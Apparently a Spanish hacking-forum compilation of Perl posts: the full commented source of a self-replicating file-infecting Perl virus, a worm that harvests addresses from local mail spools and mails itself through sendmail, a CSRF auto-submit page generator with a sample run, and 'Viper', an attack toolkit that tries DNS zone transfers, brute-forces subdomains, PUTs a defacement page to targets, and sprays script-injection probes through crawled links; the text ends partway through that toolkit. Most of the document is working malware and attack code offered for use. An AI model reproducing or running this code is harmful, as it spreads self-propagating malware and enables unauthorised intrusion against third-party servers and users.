Wow, primero que nada quiero empezar a analizar sintacticamente las variables Path que contienen todos los directorios que seran buscados cuando quieran correr un ejecutable, pero con todos estos problemas de incopatibilidad...mejor mas tarde.
Ahora quiero ver el virus del que hable antes, el que encontre en internet. El AV detecta esta cosa como Perl.spoon, y fue creada por PaddingX. Espero que este bien para el que muestre el codigo, pero no se como contactarlo. Asique si esta leyendo esto y queres que lo saque avisame! /*Nota del traductor: Realmente al pedo traducir esto, pero bueh, asi esta todo completito =P */
Añadi algunos comentarios para que se entienda el codigo, estos estan marcados con una S

Código: perl
#!/usr/bin/perl
use File::Find;             #S uses a module to walk directories; it ships with every Perl installation
&virus();                   #S call of the virus sub
                             #S after the virus sub has run, a small payload follows
print "
This program is infected by the Perl virus
";

sub virus                   #S the virus part starts here
   {
     my ( $pid, $new );      #S declares local variables
     if( $pid = fork ) { return; }        #S parent returns to the host program; the child does the rest
     else
       {
         open( source, $0 );        #S opens the virus (the running script)
         finddepth ( \&infect, '/home/chris/test' );    #S '/home/chris/test' is where the files to infect are expected
         sub infect
             {
             open target, "$File::Find::name";          #S open the file to infect
             $_ = <target>;                             #S read its first line into a string
             if ( /(\#!.*perl)/ )                       #S look for #! xxxx perl on the first line --> is it a perl file?
             {
                 $_ = <target>;                         #S read the second line
                 if( $_ ne "use File::Find;
" )        #S if it is "use File::Find;" (already uses that module) it is not infected --> infection marker
                   {
                     $new = $1 . "
use File::Find;
&virus();
" . $_;  #S write the first 2 lines of the virus into $new
                     while( <target> ) { $new = $new . $_; }    #S append the file being infected to $new
                     seek(  source, 0, 0 );                     #S rewind the virus source
                      while( <source> ne "sub virus
" ) { };   #S read the source until the virus body is reached
                      $new = $new . "
sub virus
";            #S write 'sub virus' into $new
                      while( <source> ) { $new = $new . $_; }   #S append the rest of the virus to $new
                      close  target;                        #S close the file being infected
                      open   target, ">$File::Find::name";  #S reopen it for writing
                      print  target $new;                   #S write $new to the file
                   }
               }
             close( target );    #S close the infected file
           }
         close( source );        #S close the virus
         exit( 0 );              #S exit the program
       }
  }

# a Perl virus, by paddingx
# 08/15/1999



Bueno, como vemos el virus es de añadidura. Escribe una llamada al virus al principio y añade el resto al archivo. Esto es como la vieja infeccion de añadidura Com en DOS
El archivo infectado se vera asi:

[ Stub :
    #!/usr/bin/perl
    use File::Find;
    &virus();           ]
[... Original File ... ]
[ .. virus procedure ..]

Aun si solo corre en Unix es una linda pieza de codigo, porque pienso que es posible usar tecnicas EPO con este tipo de infeccion, buscando por un call (&Procedure) y cambiandolo por el virus y poner un call as procedure original al final del virus...
Bueno, ahora viene el ultimo pedazo de codigo, solamente para mostrar otra cosa simple que se puede hacer con perl, porque todo el mundo dice que Worms auto-enviables por mail es una cosa que solo se puede hacer con lenguajes script de windows.
Esto es un worm auto-enviable que usa sendmail y asume que los mails estan en /var/spool/mail/. Tal vez alguien, que sepa mas de linux que yo, puede intentar modificarlo para obtener la carpeta de mails de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Código: perl
#!/usr/bin/perl
open(File,$0);
@Virus=<File>;
@Virus=@Virus[0...29];                       # leading lines of the running script are the payload (slice is by line count, so comments stay inline)
close(File);

foreach $FileName (</var/spool/mail/*>) {    # every mailbox in the sendmail spool directory
  if ((-r $FileName) && (-f $FileName)) {
   open(File, "$FileName");
   @test1=<File>;
   close(File);
   @ReceiverList = grep /From:/, @test1;     # every line containing "From:" is treated as an address source
   foreach $Receiver2 (@ReceiverList){
    @Receiver = split(/:/, $Receiver2);       # text after "From:"
    @Addy = split(/</, @Receiver[1]);         # [0] display name, [1] "address>"
    open(File,">PerlWurm");                   # message body staged in a file named PerlWurm in the cwd (an on-disk artifact of a run)
    print File "Hi@Addy[0]
";
    print File "take a look at this perl script
and see what is possible to do
in perl..
";
    print File " cu soon

";
    print File @Virus;                        # payload is the message body
    print File ".
";
    close(File);

    chomp(@Addy[1]);                          # drop the newline
    chop(@Addy[1]);                           # drop the trailing '>'
    $x = `sendmail @Addy[1] < PerlWurm`;      # harvested address is passed to the shell unquoted
}}}


#39
Perl / XSRF Generator By Xianur0
Enero 27, 2011, 08:48:52 PM
Código: perl
#!/usr/bin/perl

#By Xianur0
#uxmal666[at]gmail.com

use HTML::Parser;

# Running 1-based counters for the inputs ($i) and forms ($b) reported by
# the parser callback.
$i = 1;
$b = 1;

# Only start tags are of interest; each one is handed to parsear() with its
# tag name and attribute hash.
my $parser = HTML::Parser->new(
    api_version => 3,
    start_h     => [\&parsear, 'tag, attr'],
);

print "\n\n                                       Generador XSRF By Xianur0\n\n\n";

# The HTML file to inspect is the single positional argument.
$file = $ARGV[0] || die("Use: xsrf.pl [File]\n");

# Accumulate the whole file into $html; the parser is fed one string later.
open(FILE,$file) || die "No pudo abrirse: $!";
$html .= $_ while <FILE>;

print "\nBuscando Campos....\n";
# Start-tag callback registered with HTML::Parser.  Every tag whose name
# matches "form" is recorded in %form as [name, method] under the running
# number $b; every tag matching "input" is recorded in %input as
# [name, value] under $i.  Each entry is echoed so the user can pick by
# number later.  $name/$valor/$metodo are left set as globals.
sub parsear {
    my ($tag, $attr) = @_;

    if ($tag =~ "form") {
        $name   = $attr->{"name"};
        $valor  = $attr->{"action"};
        $metodo = $attr->{"method"};
        # A form without an explicit method is reported as GET.
        $metodo = "GET" if $metodo eq "";
        print "\nFormulario $b: $name=>$valor=>$metodo\n";
        $form{$b++} = [$name, $metodo];
    }

    if ($tag =~ "input") {
        $name  = $attr->{"name"};
        $valor = $attr->{"value"};
        print "Campo $i: $name=>$valor\n";
        $input{$i++} = [$name, $valor];
    }
}
$parser->parse($html);
print "\nTerminado Archivo Parseado!..\n\n";

# Reads one answer from STDIN with its last character removed (chop, so a
# line without a trailing newline loses its final character).
sub leer_linea {
    my $linea = <STDIN>;
    chop($linea);
    return $linea;
}

print "\nEscribe el Formulario a utilizar:\n";
$forma = leer_linea();
print "Cuantos Campos(input) utilizara?\n";
$cantidad = leer_linea();

# Collect the chosen inputs as hidden fields.  A value may be replaced
# interactively; otherwise the value captured from the page is reused.
# Nothing is escaped, so the values are emitted into the markup verbatim.
for my $o (1 .. $cantidad) {
    print "Formulario $o?\n";
    $inputa = leer_linea();
    print "Desea Cambiar el Value? [y/n]\n";
    $respuesta = leer_linea();
    if ($respuesta eq "y") {
        print "Escriba el Nuevo Valor:\n";
        $valu = leer_linea();
    }
    else {
        $valu = $input{$inputa}[1];
    }
    $campos .= '<input type="hidden" name="' . $input{$inputa}[0] . '" value="' . $valu . '">';
}

print "Url Submit?\n";
$url = leer_linea();
print "Generando XSRF Espere Por Favor...\n";

# Auto-submitting form: name and method come from the chosen form, the
# action from the prompt above.
$xsrf = '<!-- XSRF Generator By Xianur0 -->
<form name="'.$form{$forma}[0].'" action="'.$url.'" method="'.$form{$forma}[1].'">'.$campos.'</form>
<script>document.'.$form{$forma}[0].'.submit()</script>';

# Output is appended, so repeated runs accumulate in the same file.  Note the
# file written is xsrf.htm while the final message names xsrf.html.
open(LECTURA,">> xsrf.htm") || die "No pudo abrirse: $!";
print LECTURA $xsrf;
close(LECTURA);
print "\n\nGenerado!: xsrf.html\n\n";


ejemplo estupido de uso:
entro a google y descargo el index:
despues:

Código: php
bt Desktop # perl xsrf.pl google.html


                                       Generador XSRF By Xianur0



Buscando Campos....

Formulario 1: f=>/search=>GET
Campo 1: hl=>es
Campo 2: q=>
Campo 3: btnG=>Buscar con Google
Campo 4: btnI=>Voy a tener suerte
Campo 5: meta=>
Campo 6: meta=>lr=lang_es
Campo 7: meta=>cr=countryMX

Terminado Archivo Parseado!..


Escribe el Formulario a utilizar:
1
Cuantos Campos(input) utilizara?
6
Formulario 1?
1
Desea Cambiar el Value? [y/n]
y
Escriba el Nuevo Valor:
en
Formulario 2?
2
Desea Cambiar el Value? [y/n]
y
Escriba el Nuevo Valor:
Xianur0
Formulario 3?
3
Desea Cambiar el Value? [y/n]
n
Formulario 4?
5
Desea Cambiar el Value? [y/n]
n
Formulario 5?
6
Desea Cambiar el Value? [y/n]
n
Formulario 6?
7
Desea Cambiar el Value? [y/n]
n
Url Submit?
http://www.google.com/search
Generando XSRF Espere Por Favor...


Generado!: xsrf.html


Resultado:

Código: php
<!-- XSRF Generator By Xianur0 -->
<form name="f" action="http://www.google.com/search" method="GET"><input type="hidden" name="hl" value="en"><input type="hidden" name="q" value="Xianur0"><input type="hidden" name="btnG" value="Buscar con Google"><input type="hidden" name="meta" value=""><input type="hidden" name="meta" value="lr=lang_es"><input type="hidden" name="meta" value="cr=countryMX"></form>
<script>document.f.submit()</script>


y se hace una busqueda con mi nick xD...

Saludos!
#40
Perl / Viper 0.1 Priv8 Tool By Xianur0
Enero 27, 2011, 08:48:15 PM
Código: perl
#!/usr/bin/perl


  use MIME::Base64::Perl;
  use IO::Socket::SSL;
  use Net::DNS;
  use Net::DNS::RR;
  use NetAddr::IP;
  use LWP::UserAgent;
  use Socket;
  use HTTP::Request::Common;
  use XML::Simple;
  use Getopt::Std;
  use HTML::LinkExtor;
  use URI::URL;
  use HTML::Parser;
  use Data::Dumper;
  use Term::ANSIColor qw(:constants);
    $Term::ANSIColor::AUTORESET = 1;     # colour attributes reset at the end of every print

#Viper By Xianur0
#[email protected]

#CONFIGURACION:
#------------------------------------------
$ver = "0.3";                            # version string (the post title says 0.1)
$useragent = "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";   # UA presented by HTTP requests
%whoisserver = (                         # TLD -> whois server, looked up by the whois routine
         'com', 'whois.crsnic.net',
         'net', 'whois.crsnic.net',
         'edu', 'whois.crsnic.net',
         'org', 'whois.publicinterestregistry.net',
         'info', 'whois.rotld.ro',
'mx', 'whois.nic.mx');
$ua = LWP::UserAgent->new;               # shared HTTP client (global, used by the request routines)
my $lib = XMLin("libs/lib.xml");         # XML::Simple: data file loaded relative to the cwd
#-------------------------------------------
    print BOLD RED  "\n                                ..::Viper By Xianur0::..\n\n";
my $host = $ARGV[0];
$host = shift || die "[-]Uso: dns.pl [dominio] [opciones]\nOpciones:\n-h HTTP AttackToolKit\n-w Ataque Whois\n-d Ataque DNS\n-a Ejecuta Todo lo Anterior\n-x Testear XSS Mixto\n-t Spider y Testeo de codigo (BETA) [host] -t [path]\n-i Scanner de Paths y RSS (BETA) [host] -i [path]\n";   # first argument, consumed from @ARGV
my $path = $ARGV[1];                     # read AFTER the shift: this is the third original argument, i.e. the path that follows the option flag
my $urlp = "http://".$host.$path;        # base URL for the spider; $path is undef when not given
new NetAddr::IP($host) || die "Error: IP o Dominio Incorrecto!\n";   # early check; the constructor is treated as returning false for a bad host (per the die message)
print "\n[-]Inicio del Scanneo: ". localtime()."\n";
        my $opt_string = 'whdtaxi';      # single-letter switches, none take a value
        getopts( "$opt_string", \%opt );
        whois() if $opt{w};
        dns() if $opt{d};
        http() if $opt{h};
        todo() if $opt{a};
        xss() if $opt{x};
        info() if $opt{i};
        print "[-]Lanzando Spider!\n". spider($urlp) if $opt{t};
        print "[-]Fin del Scanneo: ". localtime(). "\n";
# Runs every DNS check in sequence: SOA, MX, TXT, NS, HINFO, the PTR sweep,
# ANY, the zone-transfer attempt and finally the mixed-XSS test.
sub dns() {
    soa();
    mx();
    txt();
    ns();
    hinfo();
    dnsrotativo();
    any();
    zonas();
    xss();
}
# Runs every module in turn, then the spider over $urlp.
sub todo() {
    $_->() for (\&info, \&whois, \&dns, \&http, \&xss);
    print "[-]Lanzando Spider!\n";
    spider($urlp);
}

# Repeats the PTR sweep (consultar) until a pass reports the same address
# that the first pass reported.  $ipaddr is the global consultar() updates.
sub dnsrotativo {
    print "[-]Buscando DNS Rotativos (Mediante PTR)...:\n";
    my $consulta = NetAddr::IP->new($host);
    consultar();
    my $inicial = $ipaddr;
    consultar();
    consultar() while $inicial ne $ipaddr;
}

# PTR sweep.  Iterates as many times as NetAddr::IP->num reports for $host,
# reverse-resolving $consulta->addr() each time (the object is never advanced,
# so every iteration reads the same address) and printing IP/host pairs.
# $ipaddr is left set globally for the callers.
sub consultar {
    my $consulta = NetAddr::IP->new($host) || die "Error: IP o Dominio Incorrecto!\n";
    my $resolver = Net::DNS::Resolver->new;
    my $hosts    = $consulta->num();
    for my $n (1 .. $hosts) {
        $ipaddr = $consulta->addr();
        next unless $ipaddr;
        my $respuesta = $resolver->search("$ipaddr");
        next unless $respuesta;
        for my $rr ($respuesta->answer) {
            next unless $rr->type eq "PTR";
            print "IP: $ipaddr\n", "Host: ", $rr->ptrdname, "\n\n";
        }
    }
}

# Prints the first record of the SOA answer for $host, if any.
sub soa {
    print "[-]Registro SOA:\n";
    my $resolver = Net::DNS::Resolver->new;
    if (my $respuesta = $resolver->query($host, "SOA")) {
        my ($primero) = $respuesta->answer;
        $primero->print;
    }
    print "\n\n";
}

# Zone-transfer attempt against each nameserver collected by ns() (falling
# back to $ipaddr when none was collected).  Every transferred record is
# printed and one matching "127.0.0.1" is flagged; on failure the wildcard
# check (detectarcomodin) runs instead.  $dnsa/$array/$dat stay global.
sub zonas {
    $sdns[0] = $ipaddr if $sdns[0] eq "";
    foreach $dnsa (@sdns) {
        print "[-]Intentando Ataque AXFR....: Usando: $dnsa...";
        my $resolver = Net::DNS::Resolver->new;
        $resolver->nameservers($dnsa);
        my @zonas = $resolver->axfr($host);
        if (@zonas) {
            foreach $array (@zonas) {
                $dat = $array->string;
                if ($dat =~ "127.0.0.1") {
                    print BOLD RED "\n\n[-]Vulnerable a XSS Mixto!\n         [-] $dat\n\n\n";
                }
                print $dat . "\n";
            }
            print BOLD RED "\nVulnerado :D!\n\n";
        }
        else {
            print "Error!..........\n";
            detectarcomodin();
        }
        print "\n\n";
    }
}

# Lists the NS records for $host and appends each nameserver name to the
# global @sdns for zonas().
sub ns {
    my $resolver  = Net::DNS::Resolver->new;
    my $respuesta = $resolver->query($host, "NS");
    if ($respuesta) {
        print "[-]Servidores DNS:\n";
        foreach $array (grep { $_->type eq 'NS' } $respuesta->answer) {
            print $array->nsdname ."\n";
            push @sdns, $array->nsdname;
        }
    }
    print "\n\n";
}

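sub hinfo {
    # Prints every answer RR of a HINFO query for $host (the record that
    # carries a host's CPU/OS strings when an administrator has published
    # them). Silent when there is no answer.
    # The original declared `my $consulta` twice in the same scope; the
    # resolver and the reply now have distinct names.
    my $resolver = Net::DNS::Resolver->new;
    my $respuesta = $resolver->query($host, "HINFO");
    if ($respuesta) {
        print "\n[-]Registro HINFO:\n";
        for my $rr ($respuesta->answer) {
            $rr->print;
        }
    }
    print "\n\n";
    return;
}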

sub mx {
    # Lists the MX answers for $host, one RR per line via Net::DNS ->print,
    # followed by a single blank line. Prints nothing when there is no
    # answer.
    my $resolver = Net::DNS::Resolver->new;
    my $respuesta = $resolver->query($host, "MX") or return;
    print "\n[-]Servidores de Correo: \n";
    for my $rr ($respuesta->answer) {
        $rr->print;
    }
    print "\n";
}

sub txt {
    # Lists the TXT answers for $host (the tool labels them as MX config,
    # presumably with SPF in mind), each via Net::DNS ->print, then two
    # blank lines. Prints nothing when there is no answer.
    my $resolver = Net::DNS::Resolver->new;
    my $respuesta = $resolver->query($host, "TXT") or return;
    print "\n[-]Registro TXT (Configuracion MX): \n";
    for my $rr ($respuesta->answer) {
        $rr->print;
    }
    print "\n\n";
}

sub any {
    # "ANY" query for $host: the header line is printed unconditionally,
    # each answer RR via Net::DNS ->print when there is a reply, then two
    # blank lines. The header text looks mis-encoded but it is program
    # output, so it is reproduced byte-for-byte.
    print "[-]Obteniendo informaciiƒÂ³n Extra:\n";
    my $resolver = Net::DNS::Resolver->new;
    my $respuesta = $resolver->query($host, "ANY");
    if ($respuesta) {
        for my $rr ($respuesta->answer) {
            $rr->print;
        }
    }
    print "\n\n";
}

sub detectarcomodin {
# Wildcard check: resolves an invented label under $host. If it resolves,
# the zone has a wildcard (every name "exists"), so a DNS wordlist would
# report everything and brute2() is tried instead; otherwise brute() runs
# the wordlist. Relies on NetAddr::IP returning a false value for a name
# that does not resolve (the same convention consultar() dies on).
my $consulta = new NetAddr::IP("dnshunterxianur0.$host");
if($consulta) { print "\nServidor Protegido contra DNS Brutes Forces...."; &brute2; } else { print RED  "No Se Detecto Comodin :).\n"; brute();}
}

sub brute() {
# Subdomain wordlist over DNS, run at most once per process: the global
# $brute is set to "on" on the first call and later calls return at once.
# Each line of libs/db.txt is resolved as "<word>.<domain>"; a hit is
# printed, flagged when it resolves to loopback, and robots() is called.
# Every entry is one lookup for a name that usually does not exist, so a
# run of NXDOMAIN answers for one zone from one client is the observable
# footprint on the authoritative side. Bareword handle SUBS plus two-arg
# open are the pre-modern forms; a lexical handle and three-arg open are
# the usual replacement.
if($brute ne "on") {
$brute = "on";
$db = 'libs/db.txt';
my $sub;
open(SUBS, $db) || die "No existe la DB!\n";
# "www." is a regex (the '.' is a wildcard); for a "www.example" host the
# split yields ("", "example") and the wordlist is applied to the bare
# domain in the global $hostts.
if($host =~  "www.") {
my @dat = split("www.", $host);
$hostts = $dat[1];
}
else { $hostts = $host; }
while($sub = <SUBS>){
chomp($sub);
$remoto = "$sub.$hostts";
my $consulta = new NetAddr::IP($remoto);
if($consulta) { print "$remoto existe!\n"; $is = $consulta->addr();
if($is eq "127.0.0.1") {
    print BOLD RED "\n\n[-]Vulnerable a XSS Mixto!\n         [-] $remoto : 127.0.0.1\n\n\n";
}

# robots() reads the global $host, not $remoto, so this re-fetches the
# same http://$host/robots.txt for every hit rather than the subdomain's.
&robots;}

}
close(SUBS);
}}

sub brute2 {
# Host-header variant used when a DNS wildcard was found: requests an
# invented name under $host through the shared LWP agent ($ua, $req, $res
# are file globals; headers() decorates $req in place) and inspects the
# status code. NOTE(review): $url carries no scheme, so LWP presumably
# cannot issue it at all; and `$estado != ""` is a numeric comparison
# against 0 that holds for every HTTP status code, so the "protected"
# message is printed on every path and brute3() is never reached.
$url = "detectarcomodinesenlosregistroshost.$host";
  $req = HTTP::Request->new(GET => $url);
  &headers;
  $res = $ua->request($req);
$estado = $res->code;

if ($estado != ""){
     print "Servidor Protegido Contra Brutes Forces en el Header Host del HTTP :(...\n";
}
else {&brute3; }
}

sub headers {
    # Stamps the global $req with the tool's fixed browser-like header set
    # (same five headers, same order, same values as before). Because the
    # set never varies, it is a stable fingerprint of this tool's requests.
    my @cabeceras = (
        'Accept'          => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
        'Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3',
        'Keep-Alive'      => '300',
        'Connection'      => 'keep-alive',
        'Accept-Charset'  => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
    );
    while (my ($nombre, $valor) = splice @cabeceras, 0, 2) {
        $req->header($nombre => $valor);
    }
}

sub brute3 {
# Wordlist variant over plain TCP: for each entry of db.txt (note: a
# different path from the libs/db.txt that brute() opens) resolve
# "<word>.<host>" and report it when a TCP connect to port 80 succeeds.
# Bareword handles SUBS/SOCKET and a two-arg open, as in brute().
$db = 'db.txt';
my $sub;
open(SUBS, $db) || die "No existe la DB!";
while($sub = <SUBS>){
chomp($sub);
$remoto = "$sub.$host";
my $proto = getprotobyname('tcp');
# Lexical $ipaddr here shadows the file global of the same name only
# inside this sub. inet_aton returns undef for a name that does not
# resolve; that undef then reaches sockaddr_in, which is likely to croak
# and end the whole loop on the first miss instead of skipping the entry.
my $ipaddr = inet_aton($remoto);
my $paddr = sockaddr_in(80, $ipaddr);
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
# No timeout on the connect, so a filtered host can block here for the
# operating system's default connect time.
$conected = connect(SOCKET, $paddr);
close SOCKET;
  if ($conected) {
     print "$remoto Existe!\n";

  }
}
close(SUBS);
}

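sub robots {
    # Fetches http://$host/robots.txt through the shared LWP agent ($ua) and
    # prints the body between separator lines when the server answers with
    # success and text/plain. Uses the file-wide globals $req and $res like
    # the other HTTP helpers; headers() decorates $req in place.
    # The original compared the body with `!= ""`, a numeric test that is
    # false for any body not starting with a nonzero number, so the file
    # was almost never printed; the string test `ne ""` is what was meant.
    $req = HTTP::Request->new(GET => "http://$host/robots.txt");
    headers();
    $res = $ua->request($req);
    return unless $res->is_success;
    if ($res->content_type eq 'text/plain' && $res->content ne "") {
        print "--------------------------------------------------------------------------------------\n"
            . $res->content
            . "\n--------------------------------------------------------------------------------------\n";
    }
    return;
}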
sub http() {
# `use` runs at compile time, so IO::Socket is loaded for the whole file
# even though the line sits inside this sub. The section opens four
# separate raw sockets to $host:80 and sends hand-built requests whose
# line ends are bare "\n" or "\n\r" (HTTP expects "\r\n"); replies are
# matched against the patterns in the global $lib (libs/lib.xml).
use IO::Socket;
print "\n[-]HTTP Attack ToolKit: \n\n";
# OPTIONS banner grab. Connect timeout is 1s; when the connect fails the
# whole section is skipped with a message.
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp',  Timeout=>'1', );
if(!$sock) {print "No se Pudo Conectar a $host!\n"; } else {
print $sock "OPTIONS / HTTP/1.1\nHost: $host\n\n";
print "-----------------------Headers--------------------------\n";
while ($linea = <$sock>) {
# "HTTP/1." and the $_->{banner} strings below are used as regexes: '.'
# is a wildcard and any metacharacters inside lib.xml are live patterns.
if ($linea =~  "HTTP/1.") {
print "Estado De Respuesta: ".$linea;
}
if ($linea =~  /Server:/) {
print $linea;
for( @{$lib->{server}} ) {
if ($linea =~  "$_->{banner}") { print "Tipo de Servidor: $_->{nombre}\n"; }
}
}
for( @{$lib->{header}} ) {
if ($linea =~  "$_->{banner}") {
if($linea !~ "<") {
my @header = split(": ", $linea);
print "$_->{nombre}".$header[1];
}
}
}
}
close($sock);
print "-------------------------------------------------\n\n";
# PUT: writes /hacked.htm with a fixed body. This is a modifying probe,
# not a passive one: a server that accepts it lets anonymous clients
# create content, and the file stays on the target unless the DELETE
# below also succeeds. A failed connect dies and aborts the whole scan.
# The `my $sock` re-declarations in this one scope trigger "masks earlier
# declaration" warnings. The status numbers from $lib->{estado} are
# matched as regexes against the first response line.
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp',  ); die "No se Pudo Conectar a $host!\n" unless $sock;
print $sock "PUT /hacked.htm HTTP/1.1\nHost: $host\nContent-Length: 38\n\r\n\r<h1>Vulnerado por DNS Hunter 0.2</h1>\n\r\n\r";
@linea = (<$sock>);
for( @{$lib->{estado}} ) {
if ($linea[0] =~  $_->{numero}) {
print "[-]Vulnerable a PUT!!....\n      Estado de Respuesta: $_->{numero}\n\n";
}
}
close($sock);
# TRACE: a reply containing "message/http" means the server echoes the
# request back (cross-site tracing); disabling TRACE on the server is the
# remediation. The printed block is the tool's own demonstration text.
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', Timeout=>'10', ); die "No se Pudo Conectar a $host!\n" unless $sock;
print $sock "TRACE / HTTP/1.1\nHost: $host\n\r\n\r";
while ($linea = <$sock>) {
if ($linea =~  "message/http") {
print "[-]Vulnerable a TRACE!.....:\nCodigo XST de Demostracion:.\n------------------------------------------\n<script>\nvar xmlhttp = new XMLHttpRequest();\n//var xmlhttp=new ActiveXObject('Microsoft.XMLHTTP');\nActiveXObject('Microsoft.XMLHTTP');\nxmlhttp.open('TRACE','http://$host/',false);\nxmlhttp.send(null);\ntext=xmlhttp.responseText;\ndocument.write(text);\n</script>\n------------------------------------------\n\n";
}
      }
close($sock);
# DELETE: removes the file the PUT above created; matched the same way as
# the PUT reply.
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp',  Timeout=>'10', ); die "No se Pudo Conectar a $host!\n" unless $sock;
print $sock "DELETE /hacked.htm HTTP/1.1\nHost: $host\n\r\n\r";
@linea = (<$sock>);
for( @{$lib->{estado}} ) {
if ($linea[0] =~  $_->{numero}) {
print "[-]Vulnerable a DELETE!!....\n      Estado de Respuesta: $_->{numero}\n\n";
}
}
close($sock);
}}

sub whois() {
# Raw whois (port 43) lookup: the last label of $host selects a server
# from the global %whoisserver. Reply lines naming $host are echoed, a
# "Whois Server" referral opens a second connection to that server and
# dumps its answer verbatim, and every other line is filtered through the
# $lib->{whois} patterns. $extencion, $whoisserver and $linea are globals.
my @hosts = split(/\./, $host);
$extencion = pop(@hosts);
$whoisserver = $whoisserver{$extencion};
if($whoisserver eq "") {print "Whois No Disponible para la Extencion: $extencion";} else {
# No check that the connect succeeded: with an undef $sock the print on
# the next line dies ("Can't use an undefined value as a symbol reference").
my $sock = new IO::Socket::INET ( PeerAddr => $whoisserver, PeerPort => 43, Proto => 'tcp',  Timeout=>'10', );
# The query is sent with a leading "=" regardless of which server was
# chosen - presumably an exact-match prefix some registries understand;
# confirm against the servers listed in %whoisserver.
print $sock "=".$host."\n";
print "\n[-]Whois ($whoisserver): \n-------------------------<Whois>----------------------------\n\n";
while ($linea = <$sock>) {
# $host is interpolated as a regex here, so its dots are wildcards.
if($linea =~ $host) {
print "Server: $linea";
}
if($linea =~ "Whois Server") {
my @dato = split(": ", $linea);
# chop() drops exactly one trailing character: fine for "\n", but a
# CRLF-terminated reply would leave "\r" in the server name used below.
chop($dato[1]);
print "Server Whois Interno: $dato[1]";
my $who = new IO::Socket::INET ( PeerAddr =>$dato[1], PeerPort => 43, Proto => 'tcp',  Timeout=>'10', );
if($who) {
print $who $host."\n";
print "\n[-]<Whois Interno de $host>\n\n";
print <$who>;
print "\n\n[-]</Whois Interno de $host>\n\n";
}
} else {
for( @{$lib->{whois}} ) {
if ($linea =~  "$_->{etiqueta}") {
my @dato = split(": ", $linea);
print "$_->{imprimir}".$dato[1]; }
}
}}
print "\n-------------------------</Whois>----------------------------\n\n";
}}

sub spider() {
# Recursive link crawler plus injection probe. Each URL is fetched once
# (the global %lista is the visited set, keyed and valued by the URL), the
# attribute values of its <a> tags are collected and made absolute, and
# every link is then re-requested with each '=' in it replaced by the
# probe string below; the body is matched against the $lib->{http}
# patterns (error signatures from libs/lib.xml). Links are not limited to
# $host, so off-site URLs found on a page are crawled and probed as well.
# The probe text ends up verbatim in the request line, so it is a direct
# match for the target's access log. $p, $ua, $req, $res, $url and
# $contenido are file globals; $useragent is the global of that name (the
# one assigned inside info() is info()'s own lexical).
my $hostt=shift;
if($lista{$hostt} ne $hostt) {
$lista{$hostt} = $hostt;
  my @nexo = ();
  # Named sub nested in a sub: it binds the @nexo of the first spider()
  # call only ("Variable will not stay shared"), so on recursive calls the
  # links presumably land in that outer list rather than in the fresh
  # @nexo declared above - confirm before relying on the recursion depth.
  # NOTE(review): `sub spider()` declares an empty prototype but is called
  # with one argument (recursively below); confirm this compiles on the
  # Perl version the tool targets.
  sub tags {
     my($tag, %attr) = @_;
     return if $tag ne 'a';
     push(@nexo, values %attr);
  }
  $p = HTML::LinkExtor->new(\&tags);
  $ua = LWP::UserAgent->new;
  $ua->agent($useragent);
  $res = $ua->request(HTTP::Request->new(GET => $hostt),
                      sub {$p->parse($_[0])});
  if(!$res->is_success) { print YELLOW  "\nUser-Agent: $useragent Bloqueado!\n"; } else {
  my $base = $res->base;
  @nexo = map { $_ = url($_, $base)->abs; } @nexo;
   foreach $url (@nexo) {
my @dat = split("/", $url);
if($dat[0] eq "") { $url = "http://".$host.$url;}
# Single-quote delimiters: the replacement is literal, no interpolation.
# The substituted URL is also what gets stored in %lista and recursed on.
  $url =~ s'='=-1 <script>alert(Fenix)</script> -1'g;
  $req = HTTP::Request->new(GET => $url);
  $req->header('Accept' => 'text/html');
  $res = $ua->request($req);
  if ($res->is_success) {
    $contenido = $res->content;
for( @{$lib->{http}} ) {
if ($contenido =~  "$_->{etiqueta}") {
print "\n\nBug Detectado: $_->{imprimir}".$url."\n\n"; }
}
  }
spider($url);
}
}
}}

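sub xss(){
    # Resolves localhost.$host and reports when it points at 127.0.0.1 (the
    # tool's "XSS mixto" check). The original did `|| exit` on a failed
    # lookup, which terminated the whole scan the first time that name did
    # not resolve - and xss() runs from both dns() and todo(); a failed
    # lookup now simply returns. $xssmixto and $ipv remain file globals.
    $xssmixto = NetAddr::IP->new('localhost.' . $host) || return;
    $ipv = $xssmixto->addr();
    if ($ipv eq "127.0.0.1") {
        print BOLD RED "\n[-]Vulnerable a XSS Mixto!\n[-]localhost.$host: $ipv\n\n\n";
    }
    return;
}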


sub info() {
    # Web section: loads the pattern library, then probes a list of paths
    # (tempse) and fetches the front page (cms). Both helpers are named
    # subs nested inside this one and use its lexicals $web/$useragent;
    # named subs bind only the first instance of such lexicals, so a second
    # info() call would not be seen by them ("will not stay shared").
    # NOTE(review): `my $lib` is a lexical, so the global $lib that http(),
    # whois() and spider() read is NOT set here - confirm where (or
    # whether) that global is loaded.
    my $lib = XMLin("libs/lib.xml");
    $Term::ANSIColor::AUTORESET = 1;
    $ua = LWP::UserAgent->new;
    # Fixed Firefox 2.0.0.15 User-Agent sent on every request below; being
    # constant, it is what lets a log reader group this tool's traffic.
    my $useragent = "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";
    my $web = $urlp;
# $parser is built with parsear() as its start-tag handler, but ->parse is
# never called on it, so parsear() never runs.
my $parser = HTML::Parser->new(api_version=>3,
start_h=>[\&parsear, 'tag, attr'] ,);
# Re-assigns the lexical declared a few lines up (same value), not the
# file-level $useragent that spider() reads.
$useragent = "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";

&tempse;
&cms;

# Path probe: one HEAD request per line of libs/temps.txt under $web; any
# success status is reported as "Interesting File Found" without looking
# at the body, so a site that answers 200 for every path reports every
# entry. Bareword handle TEMPS, two-arg open, and the handle is never
# closed. $tempurl, $req and $res are file globals.
